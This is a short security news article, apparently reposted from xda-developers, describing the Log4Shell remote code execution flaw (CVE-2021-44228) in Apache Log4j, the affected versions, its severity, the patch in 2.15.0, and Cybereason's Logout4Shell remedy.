White Hat Institute

A serious Log4J flaw puts much of the internet at risk

Retrieved from xda-developers.com

The Apache Software Foundation has issued patches to address a frequently leveraged zero-day flaw in the Apache Log4j Java-based logging library that might be used to launch malicious code and gain full control of susceptible systems.

The bug, dubbed CVE-2021–44228 and known as Log4Shell or LogJam, involves an unauthenticated, remote code execution (RCE) on any application that employs the open-source software and affects Log4j versions 2.0-beta9 through 2.14.1. The vulnerability received a high score of ten out of ten on the CVSS rating scale, indicating the seriousness of the issue.

When message lookup replacement is allowed, an adversary who has control over log messages or log message parameters can run arbitrary code imported from LDAP servers. This behavior is been turned off by default in Log4j 2.15.0.

A simple line of text can cause an application to contact a malignant external host if it is logged through the vulnerable instance of Log4j, essentially giving the attacker the ability to fetch a payload from a remote server and run it locally. The flaw was discovered by Chen Zhaojun of the Alibaba Cloud Security Team, according to the project maintainers.

Because of the simplicity of attack and widespread use of Log4j in enterprise IT and DevOps, in-the-wild assaults on vulnerable servers are projected to increase in the next few days, necessitating quick patching. Cybereason, an Israeli security company, has also provided a remedy named “Logout4Shell” that addresses the loophole by reconfiguring the logger using the vulnerability itself, preventing future exploitation of the assault.

The weakness in Log4j (CVE-2021–44228) is quite serious. Log4j is used by millions of applications for logging, and all an intruder has to do is get the program to log a certain string.